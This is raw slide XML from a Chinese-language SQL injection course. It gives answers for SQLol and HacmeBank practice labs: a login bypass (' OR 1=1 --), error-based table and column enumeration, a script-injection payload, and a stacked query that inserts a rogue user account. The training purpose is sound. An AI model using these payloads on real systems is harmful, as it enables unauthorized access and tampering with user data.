            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>语句类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SELECT</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>访问类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>过滤 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>无过滤</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>输出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>单行返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，错误</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>无查询语句</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16293938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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入实例 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>SQLol</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>答案</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="836712"/>
            <a:ext cx="10972800" cy="5145435"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>修改</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>语句</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1' and &lt;script&gt;alert(11)&lt;/script&gt;# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>在火狐浏览器下弹出提示语句</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5108863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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>SQL Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>数据库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>(1)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>登录注入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>页面</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> :</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>hacmebank.com/HacmeBank_v2_Website/aspx/Login.aspx?function=Welcome</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>用户名注入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>答案：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入语句：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="mr-IN" altLang="zh-CN" dirty="0"/>
              <a:t> ' OR 1=1 --</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="133134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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>SQL Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>数据库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>(2)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>登录注入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>页面</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> :</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>hacmebank.com/HacmeBank_v2_Website/aspx/Login.aspx?function=Welcome</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>用户名注入</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>通过错误语句查出用户名</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15948654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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>SQL Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>数据库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>(2)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>答案</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>查找表明</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>having 1=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="mr-IN" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>Column </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fsb_users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>.user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>查找列</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>'UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>SELECT * FROM FSB_USERS WHERE USER_ID = </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0"/>
              <a:t>'1' </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>GROUP BY USER_ID HAVING 1 = 1;--</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>Column '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>FSB_USERS.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. Column '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>FSB_USERS.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>login_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. Column '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>FSB_USERS.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. Column '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>FSB_USERS.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>creation_date</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>查看列格式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>' UNION SELECT SUM(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>user_name</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>) FROM FSB_USERS HAVING 1=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="mr-IN" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>The sum or average aggregate operation cannot take a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1"/>
              <a:t>varchar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t> data type as an argument</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>插入用户</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>'; INSERT INTO FSB_USERS (USER_NAME, LOGIN_ID, PASSWORD, CREATION_DATE) VALUES('HAX0R12', 'HACKME12', 'EASY32', GETDATE());--</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="99135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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>通过本知识域，我们会：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入的概念</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>了解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入漏洞原理</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>了解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
